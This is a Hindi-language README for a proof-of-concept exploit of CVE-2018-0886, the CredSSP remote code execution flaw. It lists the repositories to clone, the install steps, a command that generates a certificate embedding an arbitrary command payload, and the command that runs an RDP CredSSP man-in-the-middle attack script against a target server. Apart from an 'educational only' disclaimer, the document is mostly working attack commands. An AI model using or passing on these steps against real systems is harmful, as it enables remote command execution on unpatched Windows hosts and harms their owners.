
CVE-2018-0886 को प्रदर्शित करने वाला एक कोड
यह CVE-2018-0886 का शोषण करने के लिए एक poc कोड है। इसका उपयोग केवल शैक्षिक उद्देश्यों के लिए किया जाना चाहिए। यह rdpy प्रोजेक्ट (https://github.com/preempt/rdpy) के एक fork पर निर्भर करता है, जो credssp relay की भी अनुमति देता है।
Eyal Karni, Preempt द्वारा लिखित [email protected]
यदि आप Ubuntu 14 का उपयोग कर रहे हैं, तो install फ़ाइल देखें.. इसका परीक्षण Ubuntu 16.04 पर किया गया था।
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
किसी भी डोमेन से Server Authentication के लिए उपयुक्त प्रमाणपत्र निर्यात करें। (इसका उपयोग RDP के लिए किया जाता है https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))
भेद्यता का शोषण करने वाला (पेलोड युक्त) प्रमाणपत्र उत्पन्न करने के लिए, उपयोग करें:
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD
(ExportedCert चरण 1 से निर्यात किया गया प्रमाणपत्र है। exploitc.pem ,exploitk.pem क्रमशः उत्पन्न प्रमाणपत्र और निजी कुंजी हैं।)
हमला स्क्रिप्ट चलाने के लिए:
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
अधिक विवरण स्क्रिप्ट के उपयोग अनुभाग में दिए गए हैं(--help)।